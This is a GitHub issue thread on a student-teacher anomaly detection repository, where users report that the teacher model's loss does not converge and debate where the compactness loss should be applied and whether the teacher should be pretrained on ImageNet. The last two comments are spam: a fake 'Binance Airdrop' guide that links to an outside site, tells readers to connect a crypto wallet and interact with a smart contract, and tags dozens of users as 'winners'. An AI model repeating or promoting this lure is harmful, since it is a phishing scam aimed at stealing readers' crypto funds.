### ISSUE TITLE
The loss value of the teacher model is very large

### ISSUE THREAD

**Issue by 15797261597** [denguir/student-teacher-anomaly-detection#7]
On the Screw class, the loss values don't converge when I'm running resnet_train.py, and the loss values are particularly large when I'm training the teacher model.Why is that.

**Comment by Crysking** [comment]
I ran into this problem when I train the model with the 'bottle' category. Have you find the reason?

**Comment by FrankCloud-UESTC** [comment]
I have also found this problem? Do you know how to deal with it?

**Comment by ganqieniurou** [comment]
I think there are something wrong with the loss functons. The compactness loss should be calculated before decoder, which is the last layer (the fc layer) of the teacher network. There are some conflicts between the KD loss and the compactness. The output  of teacher network, which is the 512d vector, cannot be both compact and like the output of resnet. If you read the paper, you will find that the kd loss is D(T(p))-P(p), while the compactness loss is computed over all T(p) in a minibatch.

**Comment by ThiagoViek** [comment]
I think much of the Teacher training approach is actually mistaken in this implementation. First, the authors of the paper have pretrained the Teacher Network using patches from ImageNet, not the target dataset. I assume that by using the Carpet dataset from MVTech, for example, for distilling the knowledge, you could overfit the Teacher Descriptors and end up screwing the Student training.  
Also, @ganqieniurou is right, the Compactness Loss should be computed using the feature descriptors from the layer prior to the decoder (1x1x1xd). Otherwise, you are not making sure the feature descriptor distributions are being optimized during training.

**Comment by denguir** [comment]
Hi there,



> First, the authors of the paper have pretrained the Teacher Network using patches from ImageNet, not the target dataset. I assume that by using the Carpet dataset from MVTech, for example, for distilling the knowledge, you could overfit the Teacher Descriptors and end up screwing the Student training.

@ThiagoViek you are right this is how it's done in the original paper. Let's say that I deviated from there implementation because training on the whole ImageNet would imply too much computation on my side. So I decided to speed up the training process by proposing a Teacher that is specialized within a specific class of objects rather than designing a Teacher that has broader knowledge so to say.

>Also, @ganqieniurou is right, the Compactness Loss should be computed using the feature descriptors from the layer prior to the decoder (1x1x1xd). Otherwise, you are not making sure the feature descriptor distributions are being optimized during training.

I don't remember the paper in details, but I understood the compactness loss as a way to promote sparsity for the decoder. This is why I applied it to the last layer. But I could be wrong indeed

**Comment by yffbk** [comment]
> I think much of the Teacher training approach is actually mistaken in this implementation. First, the authors of the paper have pretrained the Teacher Network using patches from ImageNet, not the target dataset. I assume that by using the Carpet dataset from MVTech, for example, for distilling the knowledge, you could overfit the Teacher Descriptors and end up screwing the Student training. Also, @ganqieniurou is right, the Compactness Loss should be computed using the feature descriptors from the layer prior to the decoder (1x1x1xd). Otherwise, you are not making sure the feature descriptor distributions are being optimized during training.

Can you share the code on how you calculate the compact loss?

**Comment by Vishnuraj2mail** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

Winners: @montelai, @deliangyang, @a-nai, @tomaszheng, @hanli-msft

Winners: @tatianamc, @jesmaelnezhad, @hyc5566, @krisbuote, @chaploud

Winners: @nucery, @allenmien, @brianbeach95, @mikkkeldp, @twentyone24

Winners: @firstfu, @mrwonderfulness, @mmacedoeu, @bugpoop, @amertulker

Winners: @rthodges, @szz1233, @wjc9011, @DarkWingMcQuack, @khazaddim

Winners: @hemantapkh, @yu-shin, @twbrandon7, @tabibzadeh, @funtik039

Winners: @nikolayvoronchikhin, @myworldbox, @Arpey, @Poodly, @Venka97

Winners: @saurabhiyer, @TA2018b, @xjx0524, @2YoungKim, @fqinhong

Winners: @mohsen-in, @intergalacticmammoth, @samadli, @happywar, @greemd

Winners: @Gabangxa, @sabirjana, @Parsbitx, @lvm0306, @peterchoee

Winners: @m-t-space, @jsgalarraga, @tianrking, @leiless, @oatmeal3000

Winners: @dushamishkin, @DmitriyVdE, @hcc5, @mutcato, @alexjorgef

Winners: @agn-7, @garnathere, @off99555, @hanung665, @0219nice

Winners: @alexmulligan, @OfficialRaider-dev, @mircofx, @PabloAlexis611, @pavelkrolevets

Winners: @OmarSaidIbrahim, @songshijun007, @SALBO-Y, @webbergde, @tonilopezortiz78

Winners: @emilius88, @braveltd, @iTzGlitch, @xSinGle, @mahho

Winners: @Universe1122, @DerienFe, @lrxtzm, @illegalbyte, @drdada

Winners: @JeremieWU23, @sdcwxy, @Chinjoy, @jacob800324, @anandarajRepo

Winners: @jdoxley, @gobs-code, @TPEC, @rAm1n, @Essaam

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @0x4952, @sathvijayt, @louisoutin, @davidhuang123, @pick958128, @ziwon, @nikklavzar, @fearandtrembling, @rpzero19, @nazarinio123
